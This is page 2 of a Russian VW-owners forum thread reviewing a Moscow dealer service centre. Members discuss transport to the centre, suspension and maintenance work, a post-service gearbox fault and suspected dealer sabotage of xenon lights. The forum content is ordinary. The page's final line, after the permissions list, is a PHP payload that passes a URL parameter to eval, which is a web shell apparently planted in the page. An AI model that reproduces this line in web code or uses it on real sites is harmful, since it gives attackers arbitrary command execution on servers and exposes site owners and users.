+ Ответить в теме
Страница 2 из 213 ПерваяПервая 1 2 3 4 12 52 102 ... ПоследняяПоследняя
Показано с 11 по 20 из 2129

Тема: VW Центр Север - Наш Официальный Друг)


  1. #11
    I место Самый Интересный Автомобиль 2011 Шумок is a jewel in the rough Шумок is a jewel in the rough Шумок is a jewel in the rough Аватар для Шумок
    Регистрация
    15.10.2010
    Откуда
    Москва
    Машина
    Volkswagen Scirocco 2.0
    Сообщений
    189
    Цитата Сообщение от BON Посмотреть сообщение
    Ну это нормально, вот если бы еще был экспресс до ближайшего метро по расписанию (((
    Там только какие-то Автобусы ходят до метро. Но я не умею на общественном транспорте ездить :(
    Относительное в Жизни Относительно

  2. #12
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от keeper Посмотреть сообщение
    не боись дядь,и не такие ацкие сложные авто там делают)
    Ааааа дорогой, я еще помню к дилеру пытался пристроить Мк3, так сказали, что с машинами младше 97 года не работают и запчастей нет.
    То что у них нет ни одной детали для Мк1 уверен. Но речь не обо мне, я все равно не поеду, т.к. предпочитаю другие места, но если народу нравится, то надо тока развиваться и особенно отношение к людям, как например написал Женька.
    песок сыпется....не останавливайтесь на достигнутом !

  3. #13
    Кипер, лобируй тему с фотосетом у них в ремзоне!!!!
    им же ПиаР!

  4. #14
    Мимо проходил Saveplastic is on a distinguished road Аватар для Saveplastic
    Регистрация
    05.06.2011
    Откуда
    Москва
    Машина
    Golf Mk5 GTI DSG
    Сообщений
    11
    у них есть маршрутка халявные вроде, от метро «Алтуфьево», «Бабушкинская» и «Медведково». Расписание есть на сайте.

  5. #15
    II место Самый Интересный Автомобиль 2011 keeper is a jewel in the rough keeper is a jewel in the rough keeper is a jewel in the rough keeper is a jewel in the rough Аватар для keeper
    Регистрация
    17.09.2008
    Откуда
    Moscow
    Машина
    флай-цокотлай
    Сообщений
    2,049
    маршрутка есть ,верно) в ближайшее время планируют взять машину,чтобы возить клиентов срочно и встречать,будет еще удобнее.
    два литра,автомат.

  6. #16
    III место Самые Интересные Диски 2011 ZIMBER is on a distinguished road Аватар для ZIMBER
    Регистрация
    20.11.2009
    Откуда
    Москва
    Машина
    Volkswagen Golf VI GTI
    Сообщений
    516
    Менял там подвеску... Спасибо Киперу за направление на этот сервис и мастерам... Всё сделали хорошо, за адекватные деньги, никаких нареканий нет... + помогли советом и кое-какими доп работами (совершенно бесплатно), за что отдельное спасибо...

  7. #17
    I место Самые Интересные Диски 2011 White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice Аватар для White pony
    Регистрация
    18.05.2010
    Откуда
    Москва
    Машина
    Audi TT RS
    Сообщений
    1,900
    Делала у них ТО75. Отношение к клиентам нормальное, без преданного заглядывания в глаза, но и нахер за мои миллионы не шлют. Я не разделяю фонтанирующий оптимизм на их счёт, пока присматриваюсь. Да, ТО сделали нормально, первые пару дней машина летала, потом... Начались сильные толчки в коробке, очень сильные. До того, как туда мастера руками лазили, этого не было.
    Вспомнилось, как меня ещё со старым МК4 дилеры (38км МКАД) смешно разыграли. После ТО сказали: Девушкааааа, у Вас скоро потухнет ксенон, но ничего, мы Вам поставим новый комплект за 19 тыс.
    И ксенон потух, ровно через 2 недели, как они и обещали. Но я поехала не к ним, в другой сервис. И там мастер с выпученным глазом сказал, что кто-то весьма профессионально нарочно перепутал полярность вилки, воткнутой в блок розжига. Сделано это было для того, чтоб ксенон умер мучительно и в срок.
    Поэтому, когда во время прохождения ТО в Алтуфьево, мастер сказал: "Ммммм, на не наворачивается ли у Вас расходомер?", меня кольнуло воспоминание. Потому что лист диагностики с ошибкой по расходомеру мне не показали, естественно. Просто пророчество. Сбывшееся, видимо.
    Но, не исключено, что парни действительно предсказали поломку. Не буду их ни в чём винить. Съезжу для начала во Внуково, такое у нас ебическое государство, даже ерунду надо в 2х независимых источниках проверять.
    По поводу клиентского сервиса - Женька прав. Булочки, вайфай, кофе, чаи, воды. Всё то, на что мне в сервисе похеру, есть. И, повторяю, любезное отношение тоже есть.
    If you wanna be rich
    You've got to be a bitch
    If you wanna ride
    Ride the White pony

    Enjoy yourself and fuck them all 0:-)

  8. #18
    Жгун Года 2010 КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough Аватар для КИБАЛЬЧИШЬ
    Регистрация
    14.04.2008
    Сообщений
    2,346
    Цитата Сообщение от White pony Посмотреть сообщение
    Да, ТО сделали нормально, первые пару дней машина летала, потом... Начались сильные толчки в коробке, очень сильные. До того, как туда мастера руками лазили, этого не было.
    На этом ТО в коробке масло меняли?

  9. #19
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    Цитата Сообщение от White pony Посмотреть сообщение
    Делала у них ТО75. Отношение к клиентам нормальное, без преданного заглядывания в глаза, но и нахер за мои миллионы не шлют. Я не разделяю фонтанирующий оптимизм на их счёт, пока присматриваюсь. Да, ТО сделали нормально, первые пару дней машина летала, потом... Начались сильные толчки в коробке, очень сильные. До того, как туда мастера руками лазили, этого не было.
    Вспомнилось, как меня ещё со старым МК4 дилеры (38км МКАД) смешно разыграли. После ТО сказали: Девушкааааа, у Вас скоро потухнет ксенон, но ничего, мы Вам поставим новый комплект за 19 тыс.
    И ксенон потух, ровно через 2 недели, как они и обещали. Но я поехала не к ним, в другой сервис. И там мастер с выпученным глазом сказал, что кто-то весьма профессионально нарочно перепутал полярность вилки, воткнутой в блок розжига. Сделано это было для того, чтоб ксенон умер мучительно и в срок.
    Поэтому, когда во время прохождения ТО в Алтуфьево, мастер сказал: "Ммммм, на не наворачивается ли у Вас расходомер?", меня кольнуло воспоминание. Потому что лист диагностики с ошибкой по расходомеру мне не показали, естественно. Просто пророчество. Сбывшееся, видимо.
    Но, не исключено, что парни действительно предсказали поломку. Не буду их ни в чём винить. Съезжу для начала во Внуково, такое у нас ебическое государство, даже ерунду надо в 2х независимых источниках проверять.
    По поводу клиентского сервиса - Женька прав. Булочки, вайфай, кофе, чаи, воды. Всё то, на что мне в сервисе похеру, есть. И, повторяю, любезное отношение тоже есть.
    Катя...связи между расходомером и дцг?! ;)
    если умер расходомер, то просто моцк начинает брать просто из своей головы таблицку по воздуху из показаний ДПДЗ...аля самотест.
    так что толчков ну никак не должно быть изза расходомера (ДМРВ).

    з.ы. я вот набираюсь эмоций (отрицательных) и скоро вылью весь собранный калл на ваг-доктора, чтото все както последнее время неадекватные.
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

  10. #20
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от S@TURN Посмотреть сообщение
    з.ы. я вот набираюсь эмоций (отрицательных) и скоро вылью весь собранный калл на ваг-доктора, чтото все както последнее время неадекватные.
    ты же писал, что посмеялись вместе хорошо :expect:
    песок сыпется....не останавливайтесь на достигнутом !

+ Ответить в теме
Страница 2 из 213 ПерваяПервая 1 2 3 4 12 52 102 ... ПоследняяПоследняя

Похожие темы

  1. Друг ищет mk5 r32 на покупку
    от valj в разделе Куплю авто
    Ответов: 2
    Последнее сообщение: 02.05.2023, 16:18
  2. Ответов: 6
    Последнее сообщение: 19.03.2013, 03:00
  3. Ответов: 21
    Последнее сообщение: 19.12.2012, 15:37
  4. Друг продает Golf 3 GTI 16v (ABF)
    от ААГ в разделе Покупка и продажа авто
    Ответов: 12
    Последнее сообщение: 13.02.2010, 16:26
  5. друг продает в питере
    от foks в разделе Покупка и продажа авто
    Ответов: 2
    Последнее сообщение: 13.09.2007, 00:50

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}